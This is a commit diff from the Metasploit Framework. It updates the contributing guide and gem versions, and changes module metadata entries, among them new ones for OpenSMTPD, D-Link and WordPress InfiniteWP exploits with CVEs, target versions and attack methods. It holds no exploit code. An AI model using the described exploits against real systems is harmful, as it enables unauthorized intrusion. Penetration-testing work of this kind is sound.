automatic module_metadata_base.json update

Land #12902 , Add exploit module for crosschex buffer overflow
2020-02-13 09:58:47 -06:00 · 2020-02-13 15:48:10 +00:00 · 2020-02-13 15:43:38 +00:00 · 2020-02-13 14:17:23 +00:00 · 2020-02-12 12:30:19 +00:00 · 2020-02-12 12:04:15 +00:00
86 changed files with 3489 additions and 2037 deletions
@@ -1,64 +1,66 @@
-# Hello, World!
-
-Thanks for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, review our
-[Code of Conduct].  There are multiple ways to help beyond just writing code:
- - [Submit bugs and feature requests] with detailed information about your issue or idea.
- - [Help fellow users with open issues] or [help fellow committers test recently submitted pull requests].
- - [Report a security vulnerability in Metasploit itself] to Rapid7.
- - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
-   integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
-
 # Contributing to Metasploit
+Thank you for your interest in making Metasploit -- and therefore, the
+world -- a better place!  Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved. 
+
+## Code Free Contributions 
+Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
+
+ - You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new) with detailed information about your issue or idea: 
+ 	- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
+ 	- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
+ - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed! 
+ - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality. 
+ - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!  
+ - [Add module documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation). New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand. 

-Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
-it into Metasploit's master branch.  If you do not care to follow these rules, your contribution
-**will** be closed. Sorry!

 ## Code Contributions
+For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit). It will help you to get started and avoid some common mistakes.

-* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
+Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.  
+
+Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
+will be closed. We need to ensure the code we're adding to master is written to a high standard.
+
+
+### Code Contribution Do's & Don'ts:
+--
+#### <u>Pull Requests</u>
+**Pull request [PR#9966] is a good example to follow.**
+
+* **Do** create a [topic branch] to work on instead of working directly on `master`. This helps to:
+	*  Protect the process.
+	* Ensures users are aware of commits on the branch being considered for merge.  
+	* Allows for a location for more commits to be offered without mingling with other contributor changes.
+	* Allows contributors to make progress while a PR is still being reviewed.
 * **Do** follow the [50/72 rule] for Git commit messages.
-* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** create a [topic branch] to work on instead of working directly on `master`.
-  This helps protect the process, ensures users are aware of commits on the branch being considered for merge,
-  allows for a location for more commits to be offered without mingling with other contributor changes,
-  and allows contributors to make progress while a PR is still being reviewed.
-
-
-### Pull Requests
-
 * **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
-* **Do** include [console output], especially for witnessable effects in `msfconsole`.
+* **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
 * **Don't** post questions in older closed PRs.

-Pull request [PR#9966] is a good example to follow.
-
-#### New Modules
-
+#### <u>New Modules</u>
+* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
+* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
 * **Do** use the many module mixin [API]s.
-* **Don't** include more than one module per pull request.
 * **Do** include instructions on how to setup the vulnerable environment or software.
 * **Do** include [Module Documentation] showing sample run-throughs.
-* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and
-  anything "serious" can be done with post modules and local exploits.
-
-#### Library Code
+* **Don't** include more than one module per pull request.
+* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and anything "serious" can be done with post modules and local exploits.

+#### <u>Library Code</u>
 * **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
 * **Do** follow [Better Specs] - it's like the style guide for specs.
 * **Do** write [YARD] documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.

-#### Bug Fixes
-
+#### <u>Bug Fixes</u>
 * **Do** include reproduction steps in the form of verification steps.
 * **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.

@@ -99,8 +101,8 @@ curve, so keep it up!
 [Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
 [scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
-[Better Specs]:http://betterspecs.org
+[Better Specs]:http://www.betterspecs.org/
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
 [Metasploit Slack]:https://www.metasploit.com/slack
-[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.72)
+    metasploit-framework (5.0.74)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -117,16 +117,16 @@ GEM
    arel-helpers (2.11.0)
      activerecord (>= 3.1.0, < 7)
    aws-eventstream (1.0.3)
-    aws-partitions (1.267.0)
+    aws-partitions (1.270.0)
    aws-sdk-core (3.89.1)
      aws-eventstream (~> 1.0, >= 1.0.2)
      aws-partitions (~> 1, >= 1.239.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.137.0)
+    aws-sdk-ec2 (1.139.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.32.0)
+    aws-sdk-iam (1.33.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
    aws-sdk-kms (1.28.0)
@@ -223,7 +223,7 @@ GEM
    mini_portile2 (2.4.0)
    minitest (5.14.0)
    mqtt (0.5.0)
-    msgpack (1.3.1)
+    msgpack (1.3.3)
    multipart-post (2.1.1)
    nessus_rest (0.1.6)
    net-ssh (5.2.0)
@@ -231,7 +231,7 @@ GEM
    nexpose (7.2.1)
    nokogiri (1.10.7)
      mini_portile2 (~> 2.4.0)
-    octokit (4.15.0)
+    octokit (4.16.0)
      faraday (>= 0.9)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.2)
@@ -356,15 +356,14 @@ GEM
      rubyntlm
      windows_error
    rubyntlm (0.6.2)
-    rubyzip (2.0.0)
+    rubyzip (2.2.0)
    sawyer (0.8.2)
      addressable (>= 2.3.5)
      faraday (> 0.8, < 2.0)
-    simplecov (0.17.1)
+    simplecov (0.18.1)
      docile (~> 1.1)
-      json (>= 1.8, < 3)
-      simplecov-html (~> 0.10.0)
-    simplecov-html (0.10.2)
+      simplecov-html (~> 0.11.0)
+    simplecov-html (0.11.0)
    sinatra (1.4.8)
      rack (~> 1.5)
      rack-protection (~> 1.4)
@@ -10,10 +10,10 @@ afm, 0.2.2, MIT
 arel, 6.0.4, MIT
 arel-helpers, 2.11.0, MIT
 aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.267.0, "Apache 2.0"
+aws-partitions, 1.270.0, "Apache 2.0"
 aws-sdk-core, 3.89.1, "Apache 2.0"
-aws-sdk-ec2, 1.137.0, "Apache 2.0"
-aws-sdk-iam, 1.32.0, "Apache 2.0"
+aws-sdk-ec2, 1.139.0, "Apache 2.0"
+aws-sdk-iam, 1.33.0, "Apache 2.0"
 aws-sdk-kms, 1.28.0, "Apache 2.0"
 aws-sdk-s3, 1.60.1, "Apache 2.0"
 aws-sigv4, 1.1.0, "Apache 2.0"
@@ -53,23 +53,23 @@ loofah, 2.4.0, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 3.0.4, "New BSD"
-metasploit-framework, 5.0.72, "New BSD"
+metasploit-framework, 5.0.74, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.83, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.84, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.10, "New BSD"
 metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
 minitest, 5.14.0, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.3.1, "Apache 2.0"
+msgpack, 1.3.3, "Apache 2.0"
 multipart-post, 2.1.1, MIT
 nessus_rest, 0.1.6, MIT
 net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
 nokogiri, 1.10.7, MIT
-octokit, 4.15.0, MIT
+octokit, 4.16.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
@@ -122,10 +122,10 @@ ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.1.0, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 2.0.0, "Simplified BSD"
+rubyzip, 2.2.0, "Simplified BSD"
 sawyer, 0.8.2, MIT
-simplecov, 0.17.1, MIT
-simplecov-html, 0.10.2, MIT
+simplecov, 0.18.1, MIT
+simplecov-html, 0.11.0, MIT
 sinatra, 1.4.8, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 2.0.0, MIT
@@ -8083,10 +8083,10 @@
    "name": "Password Cracker: Databases",
    "fullname": "auxiliary/analyze/crack_databases",
    "aliases": [
-      "auxiliary/analyze/jtr_mssql",
-      "auxiliary/analyze/jtr_mysql",
-      "auxiliary/analyze/jtr_oracle",
-      "auxiliary/analyze/jtr_postgres"
+      "auxiliary/analyze/jtr_mssql_fast",
+      "auxiliary/analyze/jtr_mysql_fast",
+      "auxiliary/analyze/jtr_oracle_fast",
+      "auxiliary/analyze/jtr_postgres_fast"
    ],
    "rank": 300,
    "disclosure_date": null,
@@ -8110,7 +8110,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-10-08 20:31:23 +0000",
+    "mod_time": "2020-02-06 10:23:53 +0000",
    "path": "/modules/auxiliary/analyze/crack_databases.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_databases",
@@ -8275,8 +8275,7 @@
    "name": "Password Cracker: Windows",
    "fullname": "auxiliary/analyze/crack_windows",
    "aliases": [
-      "auxiliary/analyze/jtr_crack_fast",
-      "auxiliary/analyze/jtr_windows"
+      "auxiliary/analyze/jtr_windows_fast"
    ],
    "rank": 300,
    "disclosure_date": null,
@@ -8300,7 +8299,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-10-08 20:31:23 +0000",
+    "mod_time": "2020-02-06 10:23:53 +0000",
    "path": "/modules/auxiliary/analyze/crack_windows.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_windows",
@@ -8311,270 +8310,6 @@
    },
    "needs_cleanup": false
  },
-  "auxiliary_analyze/jtr_aix": {
-    "name": "John the Ripper AIX Password Cracker",
-    "fullname": "auxiliary/analyze/jtr_aix",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from passwd files on AIX systems.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_aix.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_aix",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_linux": {
-    "name": "John the Ripper Linux Password Cracker",
-    "fullname": "auxiliary/analyze/jtr_linux",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from unshadowed passwd files from Unix systems. The module will only crack\n        MD5, BSDi and DES implementations by default. Set Crypt to true to also try to crack\n        Blowfish and SHA(256/512). Warning: This is much slower.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_linux.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_linux",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_mssql_fast": {
-    "name": "John the Ripper MS SQL Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_mssql_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from the mssql_hashdump module. Passwords that have been successfully\n        cracked are then saved as proper credentials.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_mssql_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_mssql_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_mysql_fast": {
-    "name": "John the Ripper MySQL Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_mysql_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from the mysql_hashdump module. Passwords that have been successfully\n        cracked are then saved as proper credentials.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_mysql_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_mysql_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_oracle_fast": {
-    "name": "John the Ripper Oracle Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_oracle_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from the oracle_hashdump module. Passwords that have been successfully\n        cracked are then saved as proper credentials.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_oracle_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_oracle_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_postgres_fast": {
-    "name": "John the Ripper Postgres SQL Password Cracker",
-    "fullname": "auxiliary/analyze/jtr_postgres_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>"
-    ],
-    "description": "This module uses John the Ripper to attempt to crack Postgres password\n          hashes, gathered by the postgres_hashdump module. It is slower than some of the other\n          JtR modules because it has to do some wordlist manipulation to properly handle postgres'\n          format.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_postgres_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_postgres_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_windows_fast": {
-    "name": "John the Ripper Windows Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_windows_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal\n        of this module is to find trivial passwords in a short amount of time. To\n        crack complex passwords or use large wordlists, John the Ripper should be\n        used outside of Metasploit. This initial version just handles LM/NTLM credentials\n        from hashdump and uses the standard wordlist and rules.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_windows_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_windows_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
  "auxiliary_analyze/modbus_zip": {
    "name": "Extract zip from Modbus communication",
    "fullname": "auxiliary/analyze/modbus_zip",
@@ -49914,7 +49649,7 @@
      "Cliff Stoll",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module exploits a stack buffer overflow in fingerd on 4.3BSD.\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.",
+    "description": "This module exploits a stack buffer overflow in fingerd on 4.3BSD.\n\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n        Currently, only bsd/vax/shell_reverse_tcp is supported.",
    "references": [
      "URL-https://en.wikipedia.org/wiki/Morris_worm",
      "URL-https://spaf.cerias.purdue.edu/tech-reps/823.pdf",
@@ -49934,7 +49669,7 @@
    "targets": [
      "@(#)fingerd.c   5.1 (Berkeley) 6/6/85"
    ],
-    "mod_time": "2019-12-23 19:02:13 +0000",
+    "mod_time": "2020-02-05 17:21:47 +0000",
    "path": "/modules/exploits/bsd/finger/morris_fingerd_bof.rb",
    "is_install_path": true,
    "ref_name": "bsd/finger/morris_fingerd_bof",
@@ -60340,7 +60075,7 @@
    "targets": [
      "Exim 4.87 - 4.91"
    ],
-    "mod_time": "2019-07-18 10:45:44 +0000",
+    "mod_time": "2020-02-05 19:13:19 +0000",
    "path": "/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/exim4_deliver_message_priv_esc",
@@ -64695,6 +64430,47 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/upnp/dlink_dir859_exec_ssdpcgi": {
+    "name": "D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi",
+    "fullname": "exploit/linux/upnp/dlink_dir859_exec_ssdpcgi",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-24",
+    "type": "exploit",
+    "author": [
+      "s1kr10s",
+      "secenv"
+    ],
+    "description": "D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.",
+    "references": [
+      "CVE-2019-20215",
+      "URL-https://medium.com/@s1kr10s/2e799acb8a73"
+    ],
+    "platform": "Linux",
+    "arch": "mipsbe",
+    "rport": "1900",
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-02-05 11:53:51 +0000",
+    "path": "/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb",
+    "is_install_path": true,
+    "ref_name": "linux/upnp/dlink_dir859_exec_ssdpcgi",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/upnp/dlink_dir859_subscribe_exec": {
    "name": "D-Link DIR-859 Unauthenticated Remote Command Execution",
    "fullname": "exploit/linux/upnp/dlink_dir859_subscribe_exec",
@@ -84745,7 +84521,7 @@
      "Cliff Stoll",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module exploits a SUID installation of the Emacs movemail utility\n        to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.\n        The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.",
+    "description": "This module exploits a SUID installation of the Emacs movemail utility\n        to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.\n\n        The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.",
    "references": [
      "URL-https://en.wikipedia.org/wiki/Movemail",
      "URL-https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg",
@@ -84766,7 +84542,7 @@
    "targets": [
      "/usr/lib/crontab.local"
    ],
-    "mod_time": "2018-12-03 12:22:40 +0000",
+    "mod_time": "2020-02-05 17:21:47 +0000",
    "path": "/modules/exploits/unix/local/emacs_movemail.rb",
    "is_install_path": true,
    "ref_name": "unix/local/emacs_movemail",
@@ -85276,7 +85052,7 @@
      "Cliff Stoll",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module exploits sendmail's well-known historical debug mode to\n        escape to a shell and execute commands in the SMTP RCPT TO command.\n\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n        Currently only cmd/unix/reverse and cmd/unix/generic are supported.",
+    "description": "This module exploits sendmail's well-known historical debug mode to\n        escape to a shell and execute commands in the SMTP RCPT TO command.\n\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n        Currently, only cmd/unix/reverse and cmd/unix/generic are supported.",
    "references": [
      "URL-https://en.wikipedia.org/wiki/Morris_worm",
      "URL-https://spaf.cerias.purdue.edu/tech-reps/823.pdf",
@@ -85295,7 +85071,7 @@
    "targets": [
      "@(#)version.c       5.51 (Berkeley) 5/2/86"
    ],
-    "mod_time": "2019-12-23 19:02:13 +0000",
+    "mod_time": "2020-02-05 19:13:19 +0000",
    "path": "/modules/exploits/unix/smtp/morris_sendmail_debug.rb",
    "is_install_path": true,
    "ref_name": "unix/smtp/morris_sendmail_debug",
@@ -85306,6 +85082,48 @@
    },
    "needs_cleanup": null
  },
+  "exploit_unix/smtp/opensmtpd_mail_from_rce": {
+    "name": "OpenSMTPD MAIL FROM Remote Code Execution",
+    "fullname": "exploit/unix/smtp/opensmtpd_mail_from_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-01-28",
+    "type": "exploit",
+    "author": [
+      "Qualys",
+      "wvu <wvu@metasploit.com>",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "This module exploits a command injection in the MAIL FROM field during\n        SMTP interaction with OpenSMTPD to execute code as the root user.",
+    "references": [
+      "CVE-2020-7247",
+      "URL-https://www.openwall.com/lists/oss-security/2020/01/28/3"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 25,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "OpenSMTPD >= commit a8e222352f"
+    ],
+    "mod_time": "2020-02-06 11:03:00 +0000",
+    "path": "/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/smtp/opensmtpd_mail_from_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/smtp/qmail_bash_env_exec": {
    "name": "Qmail SMTP Bash Environment Variable Injection (Shellshock)",
    "fullname": "exploit/unix/smtp/qmail_bash_env_exec",
@@ -91580,6 +91398,58 @@
    },
    "needs_cleanup": true
  },
+  "exploit_unix/webapp/wp_infinitewp_auth_bypass": {
+    "name": "WordPress InfiniteWP Client Authentication Bypass",
+    "fullname": "exploit/unix/webapp/wp_infinitewp_auth_bypass",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2020-01-14",
+    "type": "exploit",
+    "author": [
+      "WebARX",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits an authentication bypass in the WordPress\n        InfiniteWP Client plugin to log in as an administrator and execute\n        arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.\n\n        The module will attempt to retrieve the original PLUGIN_FILE contents\n        and restore them after payload execution. If VerifyContents is set,\n        which is the default setting, the module will check to see if the\n        restored contents match the original.\n\n        Note that a valid administrator username is required for this module.\n\n        WordPress >= 4.9 is currently not supported due to a breaking WordPress\n        API change. Tested against 4.8.3.",
+    "references": [
+      "WPVDB-10011",
+      "URL-https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/",
+      "URL-https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/",
+      "URL-https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "InfiniteWP Client < 1.9.4.5"
+    ],
+    "mod_time": "2020-02-07 12:12:35 +0000",
+    "path": "/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/wp_infinitewp_auth_bypass",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/webapp/wp_infusionsoft_upload": {
    "name": "Wordpress InfusionSoft Upload Vulnerability",
    "fullname": "exploit/unix/webapp/wp_infusionsoft_upload",
@@ -107379,7 +107249,7 @@
      "metacom",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module exploits a stack-based buffer overflow on Beetel Connection Manager. The\n        vulnerability exists in the parsing of the UserName parameter in the NetConfig.ini\n        file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP\n        SP3 and Windows 7 SP1.",
+    "description": "This module exploits a stack-based buffer overflow in Beetel Connection\n        Manager. The vulnerability exists in the parsing of the UserName\n        parameter in the NetConfig.ini file.\n\n        The module has been tested successfully against version\n        PCW_BTLINDV1.0.0B04 on Windows XP SP3 and Windows 7 SP1.",
    "references": [
      "OSVDB-98714",
      "EDB-28969"
@@ -107396,7 +107266,7 @@
    "targets": [
